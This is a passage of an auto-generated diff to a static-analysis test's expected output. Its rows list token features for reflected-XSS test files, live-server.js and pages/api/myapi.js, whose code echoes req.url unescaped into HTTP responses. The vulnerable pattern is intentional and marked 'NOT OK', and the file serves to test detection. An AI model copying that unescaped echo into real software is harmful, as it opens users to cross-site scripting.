| middleware.push | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:15 | middleware.push | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | exceptional return of middlew ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | exceptional return of middlew ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | exceptional return of middlew ... T OK\\n}) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | middlew ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | middlew ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:13:2 | middlew ... T OK\\n}) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:12:9:15 | push | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:12:9:15 | push | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:12:9:15 | push | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:9:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:9:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:9:16 | this | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:9:16 | this | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:9:16 | this | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | 'arguments' object of anonymous function | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | exceptional return of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | exceptional return of anonymous function | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | exceptional return of anonymous function | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | middleware.push | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res, next) | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | functio ... OT OK\\n} | receiverName | middleware | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | return of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | return of anonymous function | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:17:13:1 | return of anonymous function | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:26:9:28 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:31:9:33 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:36:9:39 | next | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:36:9:39 | next | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:9:36:9:39 | next | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:9:36:9:39 | next | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:9:36:9:39 | next | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:17 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:17 | tainted | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:17 | tainted | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:17 | tainted | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:17 | tainted | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted = req.url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted = req.url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted = req.url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted = req.url | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:11:10:27 | tainted = req.url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:23 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:23 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:23 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:23 | req | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:23 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:27 | req.url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:27 | req.url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:27 | req.url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:27 | req.url | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:21:10:27 | req.url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:10:25:10:27 | url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:10:25:10:27 | url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:10:25:10:27 | url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:10:25:10:27 | url | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:10:25:10:27 | url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:7 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:7 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:7 | res | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:7 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:11 | res.end | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:11 | res.end | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:11 | res.end | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:11 | res.end | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:11 | res.end | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | exceptional return of res.end ... html>`) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | exceptional return of res.end ... html>`) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | exceptional return of res.end ... html>`) | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | exceptional return of res.end ... html>`) | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | exceptional return of res.end ... html>`) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | res.end ... html>`) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | res.end ... html>`) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | res.end ... html>`) | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | res.end ... html>`) | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:12:5:12:51 | res.end ... html>`) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:12:9:12:11 | end | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:12:9:12:11 | end | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:12:9:12:11 | end | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:12:9:12:11 | end | enclosingFunctionName | middleware.push#functionalargument | +| autogenerated/Xss/ReflectedXss/live-server.js:12:9:12:11 | end | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:12:13:12:50 | ` ... /html>` | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/live-server.js:12:13:12:50 | ` ... /html>` | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/live-server.js:12:13:12:50 | ` ... /html>` | contextFunctionInterfaces | | @@ -21527,6 +143344,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/live-server.js:12:36:12:49 | | enclosingFunctionName | middleware.push#functionalargument | | autogenerated/Xss/ReflectedXss/live-server.js:12:36:12:49 | | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:12:36:12:49 | | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:15:10 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:15:10 | params | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:15:10 | params | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params ... eware\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params ... eware\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:5:17:1 | params ... eware\\n} | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:15:14:17:1 | {\\n middleware\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:14:17:1 | {\\n middleware\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:15:14:17:1 | {\\n middleware\\n} | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | assignedToPropName | middleware | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:16:5:16:14 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:10 | liveServer | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:10 | liveServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:10 | liveServer | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:16 | liveServer.start | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:16 | liveServer.start | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:16 | liveServer.start | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | exceptional return of liveSer ... params) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | exceptional return of liveSer ... params) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | exceptional return of liveSer ... params) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | liveSer ... params) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | liveSer ... params) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:1:18:24 | liveSer ... params) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:18:12:18:16 | start | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:12:18:16 | start | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:18:12:18:16 | start | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | CalleeFlexibleAccessPath | liveServer.start | | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | calleeImports | live-server | @@ -21534,6 +143391,85 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:18:18:18:23 | params | receiverName | liveServer | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:1:1:0 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:1:15 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:1:15 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:1:15 | this | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:1:15 | this | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:1:15 | this | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | 'arguments' object of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | 'arguments' object of function handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | 'arguments' object of function handler | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | 'arguments' object of function handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | 'arguments' object of function handler | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | exceptional return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | exceptional return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | exceptional return of function handler | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | exceptional return of function handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | exceptional return of function handler | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | functio ... url);\\n} | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | functio ... url);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | functio ... url);\\n} | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | return of function handler | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | return of function handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:16:3:1 | return of function handler | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:25:1:31 | handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:25:1:31 | handler | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:25:1:31 | handler | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:33:1:35 | req | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:1:38:1:40 | res | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:7 | res | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:7 | res | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:7 | res | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:7 | res | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:12 | res.send | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:12 | res.send | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:12 | res.send | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:12 | res.send | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | exceptional return of res.send(req.url) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | exceptional return of res.send(req.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | exceptional return of res.send(req.url) | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | exceptional return of res.send(req.url) | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | exceptional return of res.send(req.url) | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | res.send(req.url) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | res.send(req.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | res.send(req.url) | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | res.send(req.url) | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:5:2:21 | res.send(req.url) | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:9:2:12 | send | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:9:2:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:9:2:12 | send | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:9:2:12 | send | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:9:2:12 | send | fileImports | | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:16 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:16 | req | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:16 | req | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:16 | req | fileImports | | | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | contextFunctionInterfaces | handler(req, res) | @@ -21542,30 +143478,158 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | enclosingFunctionName | handler | | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | fileImports | | | autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:14:2:20 | req.url | receiverName | res | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:18:2:20 | url | contextFunctionInterfaces | handler(req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:18:2:20 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:18:2:20 | url | enclosingFunctionBody | req res res send req url | +| autogenerated/Xss/ReflectedXss/pages/api/myapi.js:2:18:2:20 | url | enclosingFunctionName | handler | +| 